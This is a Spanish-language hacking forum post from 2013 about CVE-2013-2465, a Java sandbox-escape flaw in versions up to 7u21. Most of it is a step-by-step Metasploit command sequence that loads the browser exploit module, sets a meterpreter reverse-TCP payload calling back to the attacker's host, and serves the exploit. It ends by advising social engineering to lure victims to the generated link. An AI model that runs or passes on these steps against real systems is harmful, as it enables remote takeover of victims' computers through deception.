Foro de elhacker.net

Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: Stuxnet en 2 Septiembre 2013, 03:44 am


Título: CVE-2013-2465
Publicado por: Stuxnet en 2 Septiembre 2013, 03:44 am
(http://www.techindustriya.com/backspace/wp-content/uploads/2013/02/apple-java-bug.jpg)

CVE-2013-2465 - Java storeImageArray() Invalid Array Indexing

Este módulo de Metasploit abusa de la Vulnerabilidad matriz indexación no válida en la función storeImageArray() de la función estática para producir una corrupción de memoria y finalmente evadir el Sandbox de Java. La vulnerabilidad afecta a Java versión 7u21 y versiones anteriores.

(http://1.bp.blogspot.com/-yTIKYizC5W4/Uhbq_FUKygI/AAAAAAAAB1A/P6qihaFBJj4/s1600/cve-2013-2465.png)

Explotando CVE-2013-2465 con mestasploit:

Código:
msf > use exploit/multi/browser/java_storeimagearray

msf exploit(java_storeimagearray) > set PAYLOAD java/meterpreter/reverse_tcp

msf exploit(java_storeimagearray) > set LHOST [IP Local]

msf exploit(java_storeimagearray) > set srvhost [IP Local]

msf exploit(java_storeimagearray) > set uripath /

msf exploit(java_storeimagearray) > exploit

Ahora realizamos un poco de Ingeniería Social para enviar la dirección generada por el metasploit para hacer la sesion meterpreter.


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines